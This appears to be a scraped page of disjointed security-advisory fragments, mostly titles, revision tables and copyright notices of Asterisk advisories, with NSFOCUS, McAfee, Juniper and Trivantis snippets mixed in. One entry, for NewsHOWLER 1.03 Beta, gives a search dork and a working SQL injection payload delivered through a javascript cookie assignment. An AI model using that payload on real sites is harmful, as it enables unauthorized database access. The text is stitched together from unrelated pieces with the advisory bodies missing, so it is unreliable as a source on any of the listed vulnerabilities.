All Rights Reserved

AST-2009-009: Cross-site AJAX request vulnerability

   |-----------------------+-------------------+----------------------------|
   | October 29, 2009      | Joshua Colp       | Initial release            |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-009
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2009-006: IAX2 Call Number Resource Exhaustion

   |------------------+----------------------+------------------------------|
   | 2009-09-03       | Russell Bryant       | Initial release              |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-006
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



COSEINC Linux Advisory #1: Linux Kernel Parent Process Death Signal Vulnerability

===[ LEGAL DISCLAIMER ]=================================================

Copyright (c) 2006,2007 Wojciech Purczynski
Copyright (c) 2007 COSEINC PTE Ltd.

All Rights Reserved.

PUBLISHING, DISTRIBUTING, PRINTING, COPYING, SCANNING, DUPLICATING IN
ANY FORM, MODIFYING WITHOUT PRIOR WRITTEN PERMISSION IS STRICTLY
PROHIBITED.


AST-2009-007: ACL not respected on SIP INVITE

   |------------------------+------------------+----------------------------|
   | October 26, 2009       | Jeff Peeler      | Initial release            |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-007
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2011-001: Stack buffer overflow in SIP channel driver

                                Revision History
         Date                 Editor                  Revisions Made          
   2011-01-18        Matthew Nicholson        Initial Release                 

               Asterisk Project Security Advisory - AST-2011-001
              Copyright (c) 2011 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2009-008: SIP responses expose valid usernames

   |-----------------------+-------------------+----------------------------|
   | November 4, 2009      | Joshua Colp       | Initial release            |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-008
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2007-026 - SQL Injection issue in cdr_pgsql

   |-----------------+------------------------+-----------------------------|
   | 2007-11-29      | Tilghman Lesher        | Initial release             |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2007-026
              Copyright (c) 2007 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection

#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
#####################################################################################
#                                                                                   #
#Download : http://garr.dl.sourceforge.net/sourceforge/newshowler/NewsHOWLER-1.03-Beta.tgz
#                                                                                   #
#DORK : "Net Dupe © 2002. All Rights Reserved"                                      #
#                                                                                   #
#####################################################################################
#                                   [Exploit]                                       #
#                                                                                   #
#javascript:document.cookie = "news_user=zz'+union+select+3,3,3,3+from+news_users/*; path=/";

AST-2011-013: Possible remote enumeration of SIP endpoints with differing NAT settings

                                Revision History
           Date                 Editor                 Revisions Made         

               Asterisk Project Security Advisory - AST-2011-013
              Copyright (c) 2011 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2007-022: Buffer overflows in voicemail when using IMAP storage

    |--------------------+---------------------------+-----------------------|
    | October 9, 2007    | mmichelson@digium.com     | Initial Release       |
    +------------------------------------------------------------------------+

                Asterisk Project Security Advisory - AST-2007-022
               Copyright (c) 2007 Digium, Inc. All Rights Reserved.
   Permission is hereby granted to distribute and publish this advisory in its
                            original, unaltered form.



AST-2011-014: Remote crash possibility with SIP and the “automon” feature enabled

                                Revision History
           Date                 Editor                 Revisions Made         

               Asterisk Project Security Advisory - AST-2011-014
              Copyright (c) 2011 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



NSFOCUS SA2007-02 : Cisco Security Agent Remote Buffer Overflow Vulnerability

INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2007 NSFOCUS. All Rights Reserved. Terms of use.

NSFocus Security Team <security@nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)


AST-2008-006 - 3-way handshake in IAX2 incomplete

   |---------------------+----------------------+---------------------------|
   | April 22, 2008      | Tilghman Lesher      | Initial release           |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-006
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2009-005: Remote Crash Vulnerability in SIP channel driver

   |---------------------+----------------------+---------------------------|
   | August 10, 2009     | Tilghman Lesher      | Initial release           |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-005
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



Juniper Advisory

                Version: 6.2.0r1.0 (Firewall+VPN)

                ScreenOS WebUI
                Copyright © 1997-2008 Juniper Networks, Inc.
                All Rights Reserved.


                For the latest technical information visit:
                http://www.juniper.net


AST-2009-003: SIP responses expose valid usernames

   |-----------------+------------------------+-----------------------------|
   | 2009-04-02      | Tilghman Lesher        | Initial release             |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-003
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2011-012: Remote crash vulnerability in SIP channel driver

                                Revision History
           Date                 Editor                 Revisions Made         

               Asterisk Project Security Advisory - AST-2011-012
              Copyright (c) 2011 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2007-021: Crash from invalid/corrupted MIME bodies when using voicemail with IMAP storage

   |----------------------+---------------------+---------------------------|
   | August 24, 2007      | Mark Michelson      | Initial Release           |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2007-021
              Copyright (c) 2007 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2012-005: Heap Buffer Overflow in Skinny Channel Driver

                                Revision History
          Date                  Editor                 Revisions Made         
    04/16/2012         Matt Jordan               Initial Release              

               Asterisk Project Security Advisory - AST-2012-005
              Copyright (c) 2012 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



+ Trivantis CourseMill Enterprise Learning Management System - SQL Injection - CVE-2007-6338

An unrecoverable error has occurred.
Please report this message to your system administrator.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
Exit
©2006 Trivantis Corporation. Trivantis and CourseMill are registered trademarks of Trivantis. All Rights Reserved.

EXPLOITATION:
=============
Exploiter Beta from WatchFire's AppScan eXtensions Framework can be used to pull ALL data from the underlying database.


AST-2007-024 - Fallacious security advisory spread on the Internet involving buffer overflow in Zaptel's sethdlc application

    | 10/31/2007 | Mark Michelson | Changed severity, description, and       |
    |            |                | resolution                               |
    +------------------------------------------------------------------------+

                Asterisk Project Security Advisory - AST-2007-024
               Copyright (c) 2007 Digium, Inc. All Rights Reserved.
   Permission is hereby granted to distribute and publish this advisory in its
                            original, unaltered form.



AST-2007-027 - Database matching order permits host-based authentication to be ignored

   |-----------------+------------------------+-----------------------------|
   | 2007-12-18      | Tilghman Lesher        | Initial Release             |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2007-027
              Copyright (c) 2007 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 ActiveX Control GetObject() Security Bypass Remote Code Execution Vulnerability

    InternalName:     MVT.dll
    OriginalFilename: MVT.dll
    ProductVersion:   6.3.0.1911
    FileVersion:      6.3.0.1911
    FileDescription:  McAfee, Inc.
    LegalCopyright:   ©2011 McAfee, Inc. All Rights Reserved.


//rgod

original url: http://retrogod.altervista.org/9sg_mcafee_vt_adv.htm

AST-2011-006: Asterisk Manager User Shell Access

                                Revision History
          Date                 Editor                  Revisions Made         
   4/21/11            Matthew Nicholson        Initial version                

               Asterisk Project Security Advisory - AST-2011-006
              Copyright (c) 2011 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2010-002: Dialplan injection vulnerability

   |-----------------+--------------------+---------------------------------|
   | 16/02/10        | Leif Madsen        | Initial release                 |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2010-002
              Copyright (c) 2010 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2008-007: Cryptographic keys generated by OpenSSL on Debian-based systems compromised

   |-------------------+----------------------+-----------------------------|
   | May 15, 2008      | Mark Michelson       | Initial advisory            |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-007
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2008-012: Remote crash vulnerability in IAX2

   |--------------------+-----------------+---------------------------------|
   | December 9, 2008   | Mark Michelson  | Added "Corrected In" versions   |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-012
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2009-010: RTP Remote Crash Vulnerability

   |------------------+---------------------+-------------------------------|
   | 2009-09-03       | David Vossel        | Initial release               |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-010
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



NSFOCUS SA2007-01 : Microsoft IE5 CSS Parsing Memory Corruption Vulnerability

INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2007 NSFOCUS. All Rights Reserved. Terms of use.


NSFocus Security Team <security@nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

AST-2012-003: Stack Buffer Overflow in HTTP Manager

                                Revision History
          Date                  Editor                 Revisions Made         
    03-15-2012         Matt Jordan               Initial release              

               Asterisk Project Security Advisory - AST-2012-003
              Copyright (c) 2012 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



Copyright © 1995-2012 LinuxRocket.net. All rights reserved.